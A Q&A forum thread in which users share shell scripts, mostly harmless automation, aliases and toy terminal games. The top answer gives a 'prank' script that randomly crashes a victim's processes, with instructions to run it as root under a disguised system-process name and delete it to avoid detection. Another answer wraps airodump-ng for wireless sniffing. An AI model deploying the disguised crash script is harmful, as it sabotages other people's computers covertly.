# What are some interesting shell scripts?

Tags: bash, shell, powershell

I like the idea of being able to automate my computer with shell scripts but I'm at a loss for what I could actually do.

Do you use or have you seen shell scripts used in a novel way, either on a server, personal computer, netbook, etc.?

Some examples I was thinking of:

- **Optimize battery life:** shutting down
  services, modifying brightness,
  closing programs that might be left
  open but are unneccessary, etc
- **Create workspace profiles:** open a set of applications and perform
  actions for school, work, etc.
- **Pranks on other people's computers:** some that you found interesting...
  :)

Really interested to find out what you might have to share, thanks!

Comment: Since you're looking for a list of answers, you should mark this as Community Wiki - you do that by checking the small tick box to the bottom right of the question text area

Comment: @Wayne, can you _see_ that checkbox on any of your questions? :-) See http://meta.stackexchange.com/questions/392/should-the-community-wiki-police-be-shut-down/7183#7183 - "End users can not mark questions wiki anymore".

Comment: Well, it *has* been a few months since I've actively participated, paxdiablo, and last time I made that mistake I could go back and fix it! My mistake, and thusly flagged for moderator attention. Thanks!

Comment: Your first example is something Windows 7 does with PowerShell already. Look for the troubleshooters.

Comment: @Joey: Yeah, but it doesn't close programs I might have running when using a power supply but don't want to run when on battery (uTorrent, Limewire, any distributed computing clients).

Comment: Speaking of PowerShell, that's what actually go me thinking about shell scripting recently. I was on the bus with my tablet with no internet access, started to read the help guide. I thought it was pretty neat to be able to return and manipulate objects instead of text.

Comment: Andrew: It definitely is. It might take some adjustment if you're too far into text-munging land, but I love it by now. As for troubleshooters: You could write your own that explicitly closes programs. But that's probably overkill for that platform because it's more a single-use script :)

Answer (score 11):

Here's a fun prank

```
#!/bin/bash
user=$1
while true ; do
    kill -SEGV $(ps -u $user -o pid= | random | tail -n 1)
    sleep $RANDOM
done
```

Every few minutes a program owned by $user will segfault. Best if run as root and given an innocent name, but running it as $user works as well. Save the script as e.g. "xterm" or "kded" or "gnome-session", chmod a+x the script, and then invoke it like this:

```
$scriptname $username 2>/dev/null 1>&2 & disown $scriptname ; rm $scriptname
```

This will teach your friends not to leave their systems unlocked. This implementation uses random from bsdgames, but you could do the selection another way.

Answer (score 5):

To keep all my Git repositories up-to-date:

```
alias gitupdate='(for l in `find . -name .git | xargs -i dirname {}` ; do cd $l; pwd; git pull; cd -; done)'
```

To backup my computer to a remote space:

```
alias backup='rsync -av ~/Documents user@domain.com: --delete --delete-excluded --exclude-from=/Users/myusername/.rsync/exclude --rsh="ssh"'
```

Answer (score 3):

I've got a few that I have used/do use regularly.

One was a script took two parameters - a .cpp file and and output file. It would then compile the file and launch the code - really useful for programming C++ code at school. I also wrote one for assembler that would compile, link, and load.

I've got others that control screen brightness, launch various programs with specific settings (mainly cd to a directory)... I think the one that I used most often was my `new.c++` script that created a text file with my name, class info, `#include`s, and more, and started up vim editing the file. It was super useful.

Nothing silly, just some good, useful stuff

Answer (score 2):

I think of shell scripts as shortcuts. They are something that you do often enough that having to type out the commands every time is a waste of time. Even short little scripts that prevent you from having to remember long argument lists can be useful if you have to call them more than a few times.

For instance, I often have to do passive monitor mode wireless sniffing through airodump-ng. To that end, I threw this together quickly:

```
#!/bin/bash

# Make sure we're running as root
if [[ $EUID -ne 0 ]]
then
    echo "This script must be run as root" 1>&2
    exit 1
fi

# Make sure there is an argument 1
if [[ $# -ne 1 ]]
then
    echo "Usage: `basename $0` <fileprefix>"
    exit 65
fi

# Set up the monitor interface
airmon-ng start wlan0

# Start Sniffing with the prefix $1
airodump-ng -w $1 -t OPN --output-format pcap mon0

# Tear down the monitor interface
airmon-ng stop mon0
```

Though it should be noted that as a shell script increases in complexity, you should probably begin to consider rewriting it in a more robust language. This should be done before that simple shell script becomes some mission critical monster that is unmanageable and filled with bugs, but which everything depends on.

Answer (score 2):

I made a couple. Here's a fake microwave for your Terminal:

```
#!/bin/bash

clear
echo "What would you like to microwave?"
echo " "
echo "1) Pizza 2) Ramen 3) Hot Dog"
echo "4) S'mores       5) Tin Foil"
echo " "
read -p ">> " ans
case $ans in
  1)
   clear
   echo " _________"
   echo "|.----.|__|"
   echo "|| <] ||++|"
   echo "|'----'|__|"
   sleep 2
   clear
   echo " _________"
   echo "|.----.|3_|"
   echo "|| <] ||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 0.2
   clear
   echo " _________"
   echo "|.----.|30|"
   echo "|| <] ||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 1
   tmr=30
   for run in {30..10}
   do
    clear
    echo " _________"
    echo "|.----.|"$tmr"|"
    echo "|| <] ||++|"
    echo "|'----'|__|"
    beep -f 50 -l 1000
    ((tmr--))
   done
   for run in {9..0}
   do
    clear
    echo " _________"
    echo "|.----.|0"$tmr"|"
    echo "|| <] ||++|"
    echo "|'----'|__|"
    beep -f 50 -l 1000
    ((tmr--))
   done
   clear
   echo " _________"
   echo "|.----.|00|"
   echo "|| <] ||++|"
   echo "|'----'|__|"
   beep -f 1000 -l 500
   sleep 1
   beep -f 1000 -l 500
   sleep 1
   beep -f 1000 -l 500
   sleep 1
   exit
   ;&

  2)
   clear
   echo " _________"
   echo "|.----.|__|"
   echo "||[~~]||++|"
   echo "|'----'|__|"
   sleep 2
   clear
   echo " _________"
   echo "|.----.|3_|"
   echo "||[~~]||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 0.2
   clear
   echo " _________"
   echo "|.----.|30|"
   echo "||[~~]||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 1
   tmr=30
   for run in {30..10}
   do
    clear
    echo " _________"
    echo "|.----.|"$tmr"|"
    echo "||[~~]||++|"
    echo "|'----'|__|"
    beep -f 50 -l 1000
    ((tmr--))
   done
   for run in {9..0}
   do
    clear
    echo " _________"
    echo "|.----.|0"$tmr"|"
    echo "||[~~]||++|"
    echo "|'----'|__|"
    beep -f 50 -l 1000
    ((tmr--))
   done
   clear
   echo " _________"
   echo "|.----.|00|"
   echo "||[~~]||++|"
   echo "|'----'|__|"
   beep -f 1000 -l 500
   sleep 1
   beep -f 1000 -l 500
   sleep 1
   beep -f 1000 -l 500
   sleep 1
   exit
   ;&

  3)
   clear
   echo " _________"
   echo "|.----.|__|"
   echo "|| [|]||++|"
   echo "|'----'|__|"
   sleep 2
   clear
   echo " _________"
   echo "|.----.|3_|"
   echo "|| [|]||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 0.2
   clear
   echo " _________"
   echo "|.----.|30|"
   echo "|| [|]||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 1
   tmr=30
   for run in {30..10}
   do
    clear
    echo " _________"
    echo "|.----.|"$tmr"|"
    echo "|| [|]||++|"
    echo "|'----'|__|"
    beep -f 50 -l 1000
    ((tmr--))
   done
   for run in {9..0}
   do
    clear
    echo " _________"
    echo "|.----.|0"$tmr"|"
    echo "|| [|]||++|"
    echo "|'----'|__|"
    beep -f 50 -l 1000
    ((tmr--))
   done
   clear
   echo " _________"
   echo "|.----.|00|"
   echo "|| [|]||++|"
   echo "|'----'|__|"
   beep -f 1000 -l 500
   sleep 1
   beep -f 1000 -l 500
   sleep 1
   beep -f 1000 -l 500
   sleep 1
   exit
   ;&

  4)
   clear
   echo " _________"
   echo "|.----.|__|"
   echo "|| == ||++|"
   echo "|'----'|__|"
   sleep 2
   clear
   echo " _________"
   echo "|.----.|3_|"
   echo "|| == ||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 0.2
   clear
   echo " _________"
   echo "|.----.|30|"
   echo "|| == ||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 1
   tmr=30
   for run in {30..10}
   do
    clear
    echo " _________"
    echo "|.----.|"$tmr"|"
    echo "|| == ||++|"
    echo "|'----'|__|"
    beep -f 50 -l 1000
    ((tmr--))
   done
   for run in {9..0}
   do
    clear
    echo " _________"
    echo "|.----.|0"$tmr"|"
    echo "|| == ||++|"
    echo "|'----'|__|"
    beep -f 50 -l 1000
    ((tmr--))
   done
   clear
   echo " _________"
   echo "|.----.|00|"
   echo "|| == ||++|"
   echo "|'----'|__|"
   beep -f 1000 -l 500
   sleep 1
   beep -f 1000 -l 500
   sleep 1
   beep -f 1000 -l 500
   sleep 1
   exit
   ;&

  5)
   clear
   echo " _________"
   echo "|.----.|__|"
   echo "||<^><||++|"
   echo "|'----'|__|"
   sleep 2
   clear
   echo " _________"
   echo "|.----.|3_|"
   echo "||<^><||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 0.2
   clear
   echo " _________"
   echo "|.----.|30|"
   echo "||<^><||++|"
   echo "|'----'|__|"
   beep -f 200 -d 0 -l 5 -r 10
   sleep 1
   tmr=30
   for run in {30..25}
   do
    clear
    echo " _________"
    echo "|.----.|"$tmr"|"
    echo "||<^><||++|"
    echo "|'----'|__|"
    beep -f 50 -l 5 -d 0 -r 100
    ((tmr--))
   done
   clear
   echo "    .   _"
   echo "   23vxxas"
   echo " >553eSD34|"
   echo "|XFDADSff3|"
   echo ""
   echo "Oh no! You blew up the microwave!"
   freq=1000
   for run in {1000..200}
   do
    beep -f $freq -l 1
    ((freq--))
   done
   exit
   ;&
esac
```

and a "coin flipper".

```
#!/bin/bash

clear
echo "Flipping a coin..."
echo ""
echo "         _"
sleep 0.2
clear
echo "Flipping a coin..."
echo "         _"
echo ""
sleep 0.2
clear
echo "Flipping a coin..."
echo "         \\"
echo ""
sleep 0.2
clear
echo "Flipping a coin..."
echo "         -"
echo ""
sleep 0.2
clear
echo "Flipping a coin..."
echo "         /"
echo ""
sleep 0.2
clear
echo "Flipping a coin..."
echo "         -"
echo ""
sleep 0.2
clear
echo "Flipping a coin..."
echo ""
echo "         \\"
sleep 0.2
clear
echo "Flipping a coin..."
echo ""
echo "         _"
sleep 2
clear
echo "The coin says..."
BINR=$(( ( RANDOM % 2 )  + 0 ))
if [ $BINR == 1 ]
then
AYS="HEADS"
fi
if [ $BINR == 0 ]
then
AYS="TAILS"
fi
sleep 2
echo "     _____ "
echo "    /"$AYS"\\"
echo "    \\_____/"
echo "    \\|||||/"
beep -f $((( RANDOM % 1000 )+ 300)) -d 0 -l 500
```

both of these require you've installed "beep".
If your distro supports it, then install it with `apt-get install beep` or `apt install beep`.

Answer (score 1):

Yes. I use and create scripts all the time to automate various work tasks. An example invocation:

```
some_project_test_suite
```

Which is a script that cd's into the folder where I store some_project, and then runs a battery of different tests in that folder which would be painful to type on the commandline over and over again.

A script like that might be very simple and look something like:

```
#! /bin/bash
cd path/to/folder/containing/some_project
path/to/build/system/binary test_target1 \
                            test_target2 \
                            ...
                            test_targetN
```

That said, I'm not sure I would exactly call this novel. Automation should be fairly routine.

Answer (score 1):

If you are using a desktop that uses dbus (gnome, for example), then this article might interest you.

http://www.linuxjournal.com/article/7744

Some of the examples are for power management. I used a dbus script to automatically update my pidgin status message with random quotes. I'm sure there are plenty of pranks you could pull with dbus and cron.

Answer (score 1):

It's also handy for testing multiple values/things on certain programs. If your in school and have that kinda stuff to do like I do at least ^_^

Answer (score 1):

You can multiply the possible use cases with tools like [zenity](http://live.gnome.org/Zenity), that offer widget primitives to shell scripts.

With that help, I made a management script for our laptop, that allows control of our desktop computer:

- Wake-on-LAN, if it seems offline
- mounting my home directory there via SSHFS
- starting a backup
- ...

and the nice side effect is, that because of zenity my other family members can use the script as well.

Answer (score 1):

On my netbook I wrote some a bash script that was called at boot time and periodically once the computer was on.  It would mount my remote filesystem if an internet connection was available.  This involved inspecting my network interfaces and mounting the remote filesystem with an excellent piece of software called sshfs.  It was really nice -- if my netbook croaked, my remote RAIDed data was still sitting pretty.